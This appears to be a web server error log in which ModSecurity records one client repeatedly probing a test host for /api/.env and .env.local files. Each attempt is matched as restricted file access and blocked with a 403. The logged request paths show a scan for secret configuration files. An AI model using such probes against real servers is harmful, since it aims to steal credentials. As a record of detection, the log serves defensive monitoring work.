[Fri Jan 16 03:21:53.459681 2026] [:error] [pid 1444031] [client 45.148.10.246:60944] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwX-9MmrgwjmYTAJT7wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./api/.env
[Fri Jan 16 03:21:53.459907 2026] [:error] [pid 1444031] [client 45.148.10.246:60944] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwX-9MmrgwjmYTAJT7wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./api/.env
[Fri Jan 16 03:21:53.460077 2026] [:error] [pid 1444031] [client 45.148.10.246:60944] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwX-9MmrgwjmYTAJT7wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./api/.env
[Fri Jan 16 03:21:53.628020 2026] [:error] [pid 1444035] [client 45.148.10.246:60954] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgwbauW6yeGWXfDeFYlQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local
[Fri Jan 16 03:21:53.628252 2026] [:error] [pid 1444035] [client 45.148.10.246:60954] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgwbauW6yeGWXfDeFYlQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local
[Fri Jan 16 03:21:53.628407 2026] [:error] [pid 1444035] [client 45.148.10.246:60954] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgwbauW6yeGWXfDeFYlQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local
[Fri Jan 16 03:21:53.808783 2026] [:error] [pid 1444033] [client 45.148.10.246:60970] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local/"] [unique_id "aWmgwdLJkp65ULFQ2YYjQwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local/
[Fri Jan 16 03:21:53.809018 2026] [:error] [pid 1444033] [client 45.148.10.246:60970] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local/"] [unique_id "aWmgwdLJkp65ULFQ2YYjQwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local/
[Fri Jan 16 03:21:53.809204 2026] [:error] [pid 1444033] [client 45.148.10.246:60970] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local/"] [unique_id "aWmgwdLJkp65ULFQ2YYjQwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/api/.env.local/
[Fri Jan 16 03:21:53.987453 2026] [:error] [pid 1444034] [client 45.148.10.246:60974] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgweRfEYyDES-ZFL4i0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//api/.env.local
[Fri Jan 16 03:21:53.987677 2026] [:error] [pid 1444034] [client 45.148.10.246:60974] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgweRfEYyDES-ZFL4i0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//api/.env.local
[Fri Jan 16 03:21:53.987849 2026] [:error] [pid 1444034] [client 45.148.10.246:60974] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgweRfEYyDES-ZFL4i0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//api/.env.local
[Fri Jan 16 03:21:54.121013 2026] [:error] [pid 1444226] [client 45.148.10.246:60990] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env.local"] [unique_id "aWmgwmcpoCUgeFICb0bgOwAAAAY"